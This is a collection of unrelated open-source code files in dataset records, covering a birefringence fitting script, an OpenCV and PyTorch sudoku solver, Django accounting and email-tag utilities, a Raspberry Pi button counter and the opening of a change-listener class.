-*-\n\"\"\"\nCreated on Sun Mar 1 16:56:37 2020\n\n@author: vanlo\n\"\"\"\nimport pprint\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.odr import ODR, Model, Data, RealData\nplt.clf()\n\ndef func(x,b):\n return b*x\n\n\n # Focal location for to the bottom and 1st layer, 2nd layer and 3rd layer to bottom\nf_0_a = np.array([14.9, 14.2, 14.5, 15.9])*1e-6\nf_2_a = np.array([25, 25.1, 25.2, 25])*1e-6\n\nf_2_b = np.array([22, 23.1, 23.4, 24.1, 26])*1e-6\nf_3_b = np.array([23.5, 24.1, 25, 26.2, 27.9])*1e-6\nf_5_b = np.array([33.3, 34.8, 37.2, 36.5, 33.9])*1e-6\n\nf_4_c = np.array([69.9,70.9,70.3,70.2,70.9])*1e-6\nf_3_c = np.array([65, 65.1,65.1,65.2,65.6])*1e-6\n\nf_1_d = np.array([59.7,60.1,61.1,60.8, 60.2])*1e-6\nf_2_d = np.array([63.6,64.5,64.8,64.2,64.6])*1e-6\n\n\n # Thickness of each serepate layer\nd_0_2 = f_2_a - f_0_a\nd_1_2 = f_2_d - f_1_d\nd_2_3 = f_3_b - f_2_b\nd_3_4 = f_4_c - f_3_c\nd_3_5 = f_5_b - f_3_b\n\n \n # Cumulative thickness of the layers, so total thickness\nD_1 = np.average(d_0_2)-np.average(d_1_2)\nD_2 = np.average(d_0_2)\nD_3 = np.average(d_0_2) + np.average(d_2_3)\nD_4 = np.average(d_0_2) + np.average(d_2_3) + np.average(d_3_4)\nD_4_b = np.average(d_0_2) + np.average(d_2_3) - np.average(d_3_4)\nD_5 = np.average(d_0_2) + np.average(d_2_3) + np.average(d_3_5)\n\nD = np.array([D_1, D_2, D_3, D_5])\nD_2 = np.array([D_1, D_2, D_3, D_4_b, D_5])\nprint(D)\n\nprint(D_4)\n # The path difference for the colours in order from thin to thicker layer\ndelay_1 = np.array([270, 510, 600, 1210])*1e-9\ndelay_2 = np.array([270, 960, 1150, 640, 1700])*1e-9\n\n # Caculate the birefringence with average\n#bf_1 = delay_1/D\n#\n#\n#bf_1_avg = np.average(bf_1)\n\n\n # Error calculations\n \nu_f = 2e-6\nu_delay = np.array([20, 10, 10, 20])*1e-9\n\nu_d = np.sqrt(2*(u_f**2))\nu_d_0_2_avg = 1/len(f_0_a) * np.sqrt(len(f_0_a)* u_d**2)\nu_d_1_2_avg = 1/len(f_1_d) * np.sqrt(len(f_1_d)* u_d**2)\nu_d_2_3_avg = 1/len(f_2_b) * np.sqrt(len(f_2_b)* u_d**2)\nu_d_3_5_avg = 1/len(f_3_b) * np.sqrt(len(f_3_b)* u_d**2)\nu_d_3_4_avg = 1/len(f_3_c) * np.sqrt(len(f_3_c)* u_d**2)\n\nu_D_1 = np.sqrt(u_d_0_2_avg**2 + u_d_1_2_avg**2)\nu_D_2 = u_d_0_2_avg\nu_D_3 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2)\nu_D_4 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2 + u_d_3_4_avg**2)\nu_D_5 = np.sqrt(u_d_0_2_avg**2 + u_d_2_3_avg**2 + u_d_3_5_avg**2)\nu_D = np.array([u_D_1, u_D_2, u_D_3, u_D_5])\n\n\n # Best fit of birefringe\nlinear = Model(func)\ndata_1 = Data(D, delay_1, wd=1./u_D, we=1./u_delay)\nlinear = Model(func)\ndata_2 = Data(D_2, delay_2, wd=1./u_D, we=1./u_delay)\n\n\nodr_1 = ODR(data_1, linear, beta0=[0])\nodr_2 = ODR(data_2, linear, beta0=[0])\n\nout_1 = odr_1.run()\nout_2 = odr_2.run()\n\nout_1.pprint()\n\n\n # Plot the lot\nx = np.linspace(0,2.5e-5,200)\ny_1 = func(x, out_1.beta)\ny_2 = func(x, out_2.beta)\n\n # Best fits\nplt.plot(x,y_1, label=\"Birefringe 1\")\n#plt.plot(x,y_2, label=\"Birefringe 2\")\n\n\n # Data\nplt.errorbar(D, delay_1, xerr=u_D, yerr=u_delay, mec='k', linestyle='none',elinewidth=1,capsize=2)\nplt.errorbar(D_4, (1190e-9), xerr=u_D_4, yerr=(20e-9), mec='k', linestyle='none',elinewidth=1,capsize=2, marker='x')\nplt.ylabel('$\\Delta l_{path} \\; (m)$')\nplt.xlabel('$D \\; (m)$')\nplt.ticklabel_format(style='sci', axis='x',scilimits=(1,4))\nplt.ticklabel_format(style='sci', axis='y',scilimits=(1,4))\nplt.savefig('C:/Users/vanlo/Documents/GitHub/MicroscopyRP_Git/verslag/afbeeldingen/bf_plot.png')\nplt.show()\n\nprint(''' Birefringence 1 = %.3e +- %.3e'''\n %(out_1.beta, out_1.sd_beta))\n\n\n","repo_name":"SangersJeroen/MicroscopyRP","sub_path":"Python code/Birefingence/Birefringence calculator.py","file_name":"Birefringence calculator.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34713722319","text":"from collections import deque\nfrom sudoku.sudoku import SudokuSolver\nimport cv2\nimport numpy as np\nfrom multiprocessing import Pool\nimport os\nimport operator\nimport time\nimport torch\n\nstart_import = time.perf_counter()\nfrom CNN.model.model import ModelFactory\nfactory = ModelFactory()\nmodel = factory.load_model(model_path=\"CNN\\model\\model.pt\")\n\n\n# cap = cv2.VideoCapture(0)\ncap = cv2.VideoCapture(\"20230725_192900.mp4\")\n\n\n\ndef warped_preprocess(image, blur_size=11):\n # Convert the image to grayscale\n grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Blur the image to reduce noise\n blur = cv2.GaussianBlur(grayscale, (blur_size, blur_size), 0)\n\n # Apply adaptive thresholding to create a binary image\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n \n # Invert the image\n inverted = ~thresh\n\n # Detect lines in the image using Hough Line Transform\n lines = cv2.HoughLinesP(inverted, rho=1, theta=np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\n\n # Create a black image with the same dimensions as the original\n mask = np.zeros_like(inverted)\n\n # Draw the detected lines onto the mask\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(mask, (x1, y1), (x2, y2), (255, 255, 255), 2)\n\n # Subtract the mask from the original image to remove the lines\n result = cv2.subtract(inverted, mask)\n\n return result\n\ndef preprocess(image, blur_size=9, remove_lines=False, line_ksize=40):\n # convert image to grayscale\n grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # blur image for smoothing\n blur = cv2.GaussianBlur(grayscale, (blur_size, blur_size), 0)\n # adaptive thresholding to create a binary image\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, blur_size, 2)\n # inverting that image for model\n inverted = ~thresh\n\n if remove_lines:\n # define horizontal line erosion\n horizontal_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (line_ksize,1))\n # erode and dilate the image to remove horizontal lines\n inverted = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, horizontal_kernel)\n # define vertical line erosion\n vertical_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, line_ksize))\n # erode and dilate the image to remove vertical lines\n inverted = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, vertical_kernel)\n\n\n\n # morphological opening for removing small particles like dots or moire lines\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n morph = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, kernel)\n # dilating to increase border size\n result = cv2.dilate(morph, kernel, iterations=1)\n return result\n\ndef draw_extreme_corners(pts, original):\n cv2.circle(original, tuple(pts), 3, (255, 255, 0), cv2.FILLED)\n\ndef find_extreme_corners(polygon, limit_fn, compare_fn):\n # if we are trying to find bottom left corner, we know that it will have the smallest (x - y) value\n section, _ = limit_fn(enumerate([compare_fn(pt[0][0], pt[0][1]) for pt in polygon]),\n key=operator.itemgetter(1))\n\n return polygon[section][0]\n\ndef find_contours(img, original):\n # find contours on thresholded image\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # sort by the largest\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n polygon = None\n\n # make sure this is the one we are looking for\n for contour in contours:\n area = cv2.contourArea(contour)\n perimeter = cv2.arcLength(contour, closed=True)\n approx = cv2.approxPolyDP(contour, 0.01 * perimeter, closed=True)\n num_corners = len(approx)\n\n if num_corners == 4 and area > 1000:\n polygon = approx\n break\n\n if polygon is not None:\n # find its extreme corners\n top_left = find_extreme_corners(polygon, min, np.add) # has smallest (x + y) value\n top_right = find_extreme_corners(polygon, max, np.subtract) # has largest (x - y) value\n bot_left = find_extreme_corners(polygon, min, np.subtract) # has smallest (x - y) value\n bot_right = find_extreme_corners(polygon, max, np.add) # has largest (x + y) value\n\n # if its not a square, we don't want it\n if bot_right[1] - top_right[1] == 0:\n return []\n if not (0.95 < ((top_right[0] - top_left[0]) / (bot_right[1] - top_right[1])) < 1.05):\n return []\n\n cv2.drawContours(original, [polygon], 0, (0, 0, 255), 3)\n\n # draw corresponding circles\n [draw_extreme_corners(x, original) for x in [top_left, top_right, bot_right, bot_left]]\n\n return [top_left, top_right, bot_right, bot_left]\n\n return []\n\ndef warp_image(image, corners):\n # sort the corners in the same order\n corners = sorted(corners, key=lambda x: x[0])\n top_left, bottom_left = sorted(corners[:2], key=lambda x: x[1])\n top_right, bottom_right = sorted(corners[2:], key=lambda x: x[1])\n\n # creating an array with the four corners of the sudoku grid in the order of:\n # top-left, top-right, bottom-right, bottom-left\n corner_arr = np.array([top_left, top_right, bottom_right, bottom_left], dtype=\"float32\")\n\n # dimensions of the warped grid\n side = max([\n np.sqrt(((top_right[0]-top_left[0])**2)+((top_right[1]-top_left[1])**2)),\n np.sqrt(((bottom_right[0]-bottom_left[0])**2)+((bottom_right[1]-bottom_left[1])**2)),\n np.sqrt(((bottom_right[0]-top_right[0])**2)+((bottom_right[1]-top_right[1])**2)),\n np.sqrt(((bottom_left[0]-top_left[0])**2)+((bottom_left[1]-top_left[1])**2))\n ])\n\n dst = np.array([[0,0], [side-1,0], [side-1, side-1], [0, side-1]], dtype=\"float32\")\n\n # get the perspective transform matrix\n transmat = cv2.getPerspectiveTransform(corner_arr, dst)\n\n warped = cv2.warpPerspective(image, transmat, (int(side), int(side)))\n\n return warped\n\ndef get_grid_lines(img, length=10):\n horizontal = grid_line_helper(img, 1, length)\n vertical = grid_line_helper(img, 0, length)\n return vertical, horizontal\n\n\ndef split_into_cells(image):\n height, width = image.shape\n\n cell_height = height // 9\n cell_width = width // 9\n\n cells = []\n\n for i in range(9):\n row = []\n for j in range(9):\n cell = image[i*cell_height:(i+1)*cell_height, j*cell_width:(j+1)*cell_width]\n cells.append(cell)\n # row.append(cell)\n \n return cells\n\ndef save_cells(cells, folder=\"cells\"):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n for i in range(81):\n # for j in range(9):\n filepath = os.path.join(folder, f\"{i}.png\")\n cv2.imwrite(filepath, cells[i])\n\ndef grid_line_helper(img, shape_location, length=10):\n clone = img.copy()\n row_or_col = clone.shape[shape_location]\n size = row_or_col // length\n\n if shape_location == 0:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, size))\n\n else:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (size, 1))\n\n clone = cv2.erode(clone, kernel)\n clone = cv2.dilate(clone, kernel)\n\n return clone\n\n\ndef draw_lines(img, lines:np.ndarray):\n clone = img.copy()\n lines = np.squeeze(lines)\n\n for rho, theta in lines:\n a = np.cos(theta)\n b = np.sin(theta)\n\n x0 = a * rho\n y0 = b * rho\n\n x1 = int(x0 + 1000 * (-b))\n x2 = int(x0 - 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n y2 = int(y0 - 1000 * a)\n\n cv2.line(clone, (x1, y1), (x2, y2), (255,255,255), thickness=4)\n \n return clone\n\ndef create_grid_mask(vertical, horizontal):\n grid = cv2.add(horizontal,vertical)\n grid = cv2.adaptiveThreshold(grid, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 235, 2)\n grid = cv2.dilate(grid, cv2.getStructuringElement(cv2.MORPH_RECT, (3,3)), iterations=2)\n pts = cv2.HoughLines(grid, .2, np.pi / 90, 200)\n lines = draw_lines(grid, pts)\n mask = cv2.bitwise_not(lines)\n return mask\n\n###################################################################\n\n\ndef clean_cells(cells):\n \"\"\"\n Cleans and preprocesses a list of grayscaled cells\n\n Args:\n cells (list): List of the grayscaled images\n\n Returns:\n list: List of cleaned and preprocessed images\n \"\"\"\n # start = time.perf_counter()\n cleaned_cells = []\n i = 0\n\n for cell in cells:\n new_img, is_number = clean_helper(cell)\n\n if is_number:\n new_img = cv2.resize(new_img, (28,28))\n cleaned_cells.append(new_img)\n i+=1\n else:\n cleaned_cells.append(0)\n\n return cleaned_cells\n\n#####################################################################\n\ndef clean_helper(img):\n \"\"\"\n Cleans and preprocess individual cell\n Args:\n img (np.ndarray): Grayscaled image of a single cell\n\n Returns:\n tuple: (cleaned_image, IS_NUMBER_FLAG)\n \"\"\"\n\n # Check if image is mostly empty\n if np.isclose(img, 0).sum() / (img.shape[0] * img.shape[1]) >= 0.99:\n return np.zeros_like(img), False\n \n \n height, width = img.shape\n mid = width // 2\n\n # Check if 60% of the central width of the image is mostly black\n empty_60_percent = np.isclose(img[:, int(mid - width * 0.2):int(mid + width * 0.2)], 0).sum() / (2 * width * 0.2 * height) >= 0.90\n if empty_60_percent:\n return np.zeros_like(img), False\n \n # Find contours and sort them by the area\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n\n # Extract the bounding rectangle of the largest contour (assumed to be the digit)\n x, y, w, h = cv2.boundingRect(contours[0])\n start_x = (width - w) // 2\n start_y = (height - h) // 2\n\n # Create a new image and copy the digit region to the center of the new image\n new_img = np.zeros_like(img)\n new_img[start_y:start_y + h, start_x:start_x + w] = img[y:y + h, x:x + w]\n return new_img, True\n\ndef display_images_in_grid(images):\n # Create a blank canvas\n canvas_size = 9 * 28\n canvas = np.ones((canvas_size, canvas_size), dtype=np.uint8) * 255\n \n for i, image in enumerate(images):\n row = i // 9 # Calculate the row index\n col = i % 9 # Calculate the column index\n\n if np.array_equal(image, np.zeros((28, 28), dtype=np.uint8)):\n continue # Skip if it's a zero\n \n # Resize the image to fit in a 28x28 square\n resized_image = cv2.resize(image, (28, 28))\n\n # Calculate the top-left corner coordinates for the image\n top = row * 28\n left = col * 28\n\n # Place the image on the canvas\n canvas[top:top+28, left:left+28] = resized_image\n \n return canvas\n\ndef load_model(model_path):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = torch.jit.load(model_path, map_location=device)\n model.eval()\n return model\n\n\n\ndef recognize_digits(processed_cells, model):\n non_zero_elements = [(i, cell/255.0) for i, cell in enumerate(processed_cells) if type(cell) != int]\n # non_zero_elements = [(i, cell) for i, cell in enumerate(processed_cells) if type(cell) != int]\n non_zero_indices, non_zero_cells = zip(*non_zero_elements)\n\n non_zero_cells = np.array(non_zero_cells)\n non_zero_cells_tensor = torch.Tensor(non_zero_cells).unsqueeze(1)\n with torch.no_grad():\n output = model(non_zero_cells_tensor)\n _, preds = torch.max(output,1)\n preds = preds.tolist()\n\n preds_with_zeros = [0] * len(processed_cells)\n for index, pred in zip(non_zero_indices, preds):\n preds_with_zeros[index] = pred\n\n return preds_with_zeros\n\n\n\n\n\n\ndef empty_cell_digits(sudoku, solution):\n return [j if i == 0 else 0 for i, j in zip(sudoku, solution)]\n # return np.where(sudoku == 0, solution, 0).tolist()\n\n\ndef draw_digits(warped, digits):\n # Determine the size of each square \n square_size = warped.shape[0] // 9\n # reshape the array for convenience\n digit_grid = np.reshape(digits, (9,9))\n digit_grid = digit_grid.astype(\"int32\")\n font = cv2.FONT_HERSHEY_SIMPLEX\n for row in range(9):\n for col in range(9):\n digit = digit_grid[row,col]\n\n if digit != 0:\n # calculate the diagonal corners of current cell\n p1 = col * square_size, row * square_size # top left\n p2 = (col + 1) * square_size, (row + 1) * square_size # bottom right\n # calculating the text origin\n center = (p1[0] + p2[0]) // 2, (p1[1] + p2[1]) // 2\n text_size, _ = cv2.getTextSize(str(digit), font, square_size / 300, 2)\n text_org = (center[0] - text_size[0] // 2, center[1] + text_size[1] // 2)\n\n # draw the digit into image\n cv2.putText(warped, str(digit), text_org, font, square_size/55, (0,0,255),2)\n\n\n\n return warped\n\n\n\ndef unwarp_image(warped_frame, original_frame, corners, detection_time, solving_time):\n corners = np.array(corners)\n height, width = warped_frame.shape[0], warped_frame.shape[1]\n \n corners_source = np.array([[0, 0], [width - 1, 0], [width - 1, height - 1], [0, width - 1]], dtype='float32')\n h, status = cv2.findHomography(corners_source, corners)\n\n unwarped_frame = cv2.warpPerspective(warped_frame, h, (original_frame.shape[1], original_frame.shape[0]))\n warped = cv2.warpPerspective(warped_frame, h, (original_frame.shape[1], original_frame.shape[0]))\n # mask = np.zeros_like(original_frame)\n cv2.fillConvexPoly(original_frame, corners, 0, 16)\n # masked_frame = cv2.bitwise_and(original_frame, mask)\n # result_frame = cv2.add(masked_frame, unwarped_frame)\n frame = cv2.add(original_frame, warped)\n frame_height, frame_width = frame.shape[:2]\n overlay_text = f\"Whole process took: {detection_time:.4f} seconds\"\n cv2.putText(frame, overlay_text, (int(frame_width*0.05), int(frame_height*0.05)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, f\"Solving sudoku took: {solving_time:.4f} seconds\", (int(frame_width*0.05), int(frame_width*0.06)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n return frame\n\n###########################################################\n\n\n# class DetectionResult:\n# def __init__(self, grid, solution, corners, confidence):\n# self.grid = grid\n# self.solution = solution\n# self.corners = corners\n# self.confidence = confidence\n\n# class DetectionBuffer:\n# def __init__(self, maxlen=15, confidence_threshold=0.8):\n# self.buffer = deque(maxlen=maxlen)\n# self.confidence_threshold = confidence_threshold\n\n# def update(self, corners_detected, grid, solution):\n# # calculate the confidence score\n# grid, solution = np.array(grid), np.array(solution)\n# confidence = self.calculate_confidence(corners_detected, grid, solution)\n# result = DetectionResult(grid, solution, corners_detected, confidence)\n\n# self.buffer.append(result)\n\n# def calculate_confidence(self, corners_detected, grid, solution):\n# if solution is None:\n# return 0\n# # List of conditions and their corresponding scores\n# conditions = [\n# # (corners_detected, 1), # If corners are detected\n# (solution is not None and np.all(solution != 0), 1), # If solution is available and does not contain any 0s\n# (all(np.array_equal(solution, result.solution) for result in self.buffer), 1), # If the solution is the same as the last N solutions\n# (all(np.mean(grid == result.grid) > 0.5 for result in self.buffer), 1), # If the majority of unsolved grid is the same in the last N detections\n# ]\n\n# # Calculate the total score\n# score = sum(score for condition, score in conditions if condition)\n\n# # Normalize the score to get a confidence between 0 and 1\n# confidence = score / len(conditions)\n# return confidence\n# def get_average_confidence(self):\n# # calculating the average grid, solution, confidence\n# grids = [result.grid for result in self.buffer]\n# average_grid = np.mean(grids, axis=0)\n\n# solutions = [result.solution for result in self.buffer if result.solution is not None]\n# if solutions: # Check if solutions list is not empty\n# solutions = np.array(solutions)\n# average_solution = np.mean(solutions, axis=0)\n# else:\n# average_solution = None\n\n# average_confidence = sum(result.confidence for result in self.buffer) / len(self.buffer)\n\n# return average_grid, average_solution, average_confidence\n\n\n# # def get_average_confidence(self):\n# # average_grid = np.mean([result.grid for result in self.buffer], axis=0)\n# # # Get the list of solutions that are not None\n# # solutions = [result.solution for result in self.buffer if result.solution is not None]\n# # # If there are no solutions, return None for the average solution and confidence\n# # if not solutions:\n# # return None, None, None\n# # # Otherwise, calculate the average solution and confidence\n# # average_solution = np.mean(solutions, axis=0)\n# # average_confidence = sum(result.confidence for result in self.buffer if result.confidence is not None) / len(self.buffer)\n# # return average_grid, average_solution, average_confidence\n\n\n# def should_display(self) -> bool:\n# _, _, average_confidence = self.get_average_confidence()\n# print(f\"Average confidence: {average_confidence}\")\n# return average_confidence > self.confidence_threshold\n\n\nclass GoodDetections:\n def __init__(self, maxlen=15):\n self.buffer = deque(maxlen=maxlen)\n\n def update(self, corners_detected, grid, solution):\n if corners_detected and solution is not None and np.all(solution != 0):\n # This is a good detection\n self.buffer.append((corners_detected, grid, solution))\n\n def get_last_good_detection(self):\n if self.buffer:\n # Return the most recent good detection\n return self.buffer[-1]\n else:\n # No good detections have been stored yet\n return None, None, None\n\n\n###########################################################\n\nsolver = SudokuSolver()\n\n# modelson = \"./last_model.pt\"\n# print(f\"{fps} frames\")\n\n\nfps = cap.get(cv2.CAP_PROP_FPS)\n# buffer = DetectionBuffer(maxlen=int(fps*2))\ngood_detections = GoodDetections(maxlen=int(fps*0.5))\n# model = load_model(modelson)\nKSIZE = 15\nwhile True:#cap.isOpened():\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n ret, frame = cap.read()\n\n if not ret:\n print('no video')\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n continue\n # frame = cv2.imread(\"sudokuu.jpg\")\n\n start = time.perf_counter()\n\n\n preprocessed_frame = preprocess(frame)\n corners = find_contours(preprocessed_frame,frame)\n\n if corners:\n warped = warp_image(frame, corners)\n preprocessed_warped = preprocess(warped)\n\n\n vertical_lines, horizontal_lines = get_grid_lines(preprocessed_warped)\n mask = create_grid_mask(vertical_lines, horizontal_lines)\n numbers = cv2.bitwise_and(preprocessed_warped, mask)\n\n \n cells = split_into_cells(numbers)\n cells_processed = clean_cells(cells)\n detect_time = time.perf_counter()\n preds = recognize_digits(cells_processed, model)\n\n end = time.perf_counter()\n sudoku_time = time.perf_counter()\n board = solver.solve(preds)#sudoku_solver(preds)\n\n good_detections.update(corners, preds, board)\n corners, grid, solution = good_detections.get_last_good_detection()\n \n end2 = time.perf_counter()\n solve_time = (end2 - sudoku_time)\n predict_time = end - start\n \n if solution is not None:\n # We have a good detection to display\n empty_cells = empty_cell_digits(grid, solution)\n warped_with_digits = draw_digits(warped, empty_cells)\n cv2.imshow(\"digited warped\", warped_with_digits)\n\n frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n cv2.imshow(\"Original\", frame)\n \n\n\n\n\n\n\n # # buffer.update(corners, preds, board)\n\n \n # # if buffer.should_display():\n # # average_grid, average_solution, average_confidence = buffer.get_average_confidence()\n # # if average_solution is not None:\n # # average_solution = average_solution.tolist()\n # # empty_cells = empty_cell_digits(preds, average_solution)\n # # else:\n # # empty_cells = empty_cell_digits(preds, board)\n\n # # else:\n # # empty_cells = empty_cell_digits(preds, board)\n \n # # if empty_cells is not None:\n # # warped_with_digits = draw_digits(warped, empty_cells)\n # # cv2.imshow(\"digit warp\", warped_with_digits)\n # # frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n\n\n\n\n\n\n\n\n \n if type(board)==list:#and 0 not in board:\n empty_cells = empty_cell_digits(preds, board)\n warped_with_digits = draw_digits(warped, empty_cells)\n cv2.imshow(\"digited warped\", warped_with_digits)\n\n frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n \n # cv2.imshow(\"Overlayed\", result)\n # frame = result\n\n\n\n \n \n\n\n\n\n cv2.imshow(\"Warped screen\", warped,)\n \n \n\n cv2.imshow(\"Original\", frame)\n\n # break\n\n\n\ncv2.waitKey(0)\ncap.release()\ncv2.destroyAllWindows()","repo_name":"mehmet-nabi-duru/pytorch-sudoku-solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16475027361","text":"import pandas as pd\n\nfrom datapackage_utilities import building\n\ndf = pd.read_csv('archive/demand.csv')\n\n# set the names\ndf['name'] = df['bus'].apply(lambda row: row + '-electricity-load')\n\n# set the profile names\ndf['profile'] = df['bus'].apply(lambda row: 'el-profile-' + row)\n\n# necessary\ndf.set_index('name', inplace=True)\n\ndf_seq = pd.read_csv('archive/load_profile.csv', parse_dates=True, index_col=0)\n\nbuilding.write_sequences('load_profile.csv', df_seq)\n\nbuilding.write_elements('load.csv', df)\n","repo_name":"ZNES-datapackages/100-sea-2050","sub_path":"scripts/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2428119050","text":"from django.db.models import Q\n\n\nclass OrganizationManager(object):\n selected_organization_key = 'selected_organization_pk'\n\n def get_user_organizations(self, user):\n # To avoid circular imports\n from .models import Organization\n\n orgas = (Organization.objects\n .filter(Q(members=user) | Q(owner=user))\n .distinct())\n return orgas\n\n def set_selected_organization(self, request, organization):\n key = self.selected_organization_key\n request.session[key] = organization.pk\n\n def get_selected_organization(self, request):\n key = self.selected_organization_key\n if key not in request.session:\n return\n\n # To avoid circular imports\n from .models import Organization\n\n pk = request.session[key]\n organization = Organization.objects.get(pk=pk)\n return organization\n\n\norganization_manager = OrganizationManager()\n\n\nclass BaseNumberGenerator(object):\n \"\"\"\n Simple object for generating sale numbers.\n \"\"\"\n\n def next_number(self, organization):\n raise NotImplementedError\n\n\nclass EstimateNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.estimates.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass InvoiceNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.invoices.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass BillNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.bills.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass ExpenseClaimNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.expense_claims.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n","repo_name":"dulacp/django-accounting","sub_path":"accounting/apps/books/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"51"} +{"seq_id":"6749550208","text":"from django.template import Library, Node\nfrom ribo_api.services.utils import Utils\n\nregister = Library()\n\n\ndef do_email_tag(parser, token):\n tag = token.contents\n nodelist = parser.parse(('end%s' % tag,))\n parser.delete_first_token()\n return EmailNode(tag, nodelist)\n\n\nclass EmailNode(Node):\n def __init__(self, tag, nodelist):\n self.tag = tag\n self.nodelist = nodelist\n\n def render(self, context):\n context_var = '_%s' % self.tag\n if not context.get(context_var, False):\n return ''\n return self.nodelist.render(context)\n\n\ndef gen_loc_slug(loc, arg=None):\n return Utils.gen_search_slug('', loc.display_text)\n\n\nregister.filter('gen_loc_slug', gen_loc_slug)\nregister.tag('subject', do_email_tag)\nregister.tag('body', do_email_tag)\nregister.tag('bodyhtml', do_email_tag)\n\ncss = [\n 'background-color: #0090de; border: solid 2px #A0DEFF;',\n 'background-color: #845bf0; border: solid 2px #CAB6FF;',\n 'background-color: #5fc67c; border: solid 2px #8DF7AA;',\n 'background-color: #efa23d; border: solid 2px #FFC77F;',\n 'background-color: #ea5d5d; border: solid 2px #FFD2D2;',\n]\n\n\n@register.filter(name='gid2colorcode')\ndef gid2colorcode(value):\n index = value % 5;\n style = '\" style=\"width: 38px; height: 38px; vertical-align: middle; text-align: center; border-radius: 50%;'\n style += css[index]\n return style\n","repo_name":"RinPham/RiBo-Core","sub_path":"src/template_email/templatetags/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"39230111225","text":"import RPi.GPIO as GPIO\nimport time\n\npin = 12\n\nGPIO.setmode(GPIO.BCM)\n#GPIO.setup(pin, GPIO.IN)\nGPIO.setup(pin, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n\ncount = 0\n\ntry:\n while True:\n input_state = GPIO.input(pin)\n if input_state == True:\n count += 1\n print (str(count) + ' pressed')\n time.sleep(0.2)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n\n\n","repo_name":"jinwon-C/RaspberryPi","sub_path":"switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26303620118","text":"import logging\nimport traceback\n\nfrom horizons.util.python.callback import Callback\nfrom horizons.util.python.weakmethodlist import WeakMethodList\n\n\nclass ChangeListener:\n\t\"\"\"Trivial ChangeListener.\n\tThe object that changes and the object that listens have to inherit from this class.\n\tAn object calls _changed every time something has changed, obviously.\n\tThis function calls every Callback, that has been registered to listen for a change.\n\tNOTE: ChangeListeners aren't saved, they have to be reregistered on load\n\tNOTE: RemoveListeners must not access the object, as it is in progress of being destroyed.\n\t\"\"\"\n\n\tlog = logging.getLogger('changelistener')\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__() #TODO: check if this call is needed\n\t\tself.__init()\n\n\tdef __init(self):\n\t\tself.__listeners = WeakMethodList()\n\t\tself.__remove_listeners = WeakMethodList()\n\t\t# number of event calls\n\t\t# if any event is triggered increase the number, after all callbacks are executed decrease it\n\t\t# if it reaches 0 it means that in the current object all event callbacks were executed\n\t\tself.__event_call_number = 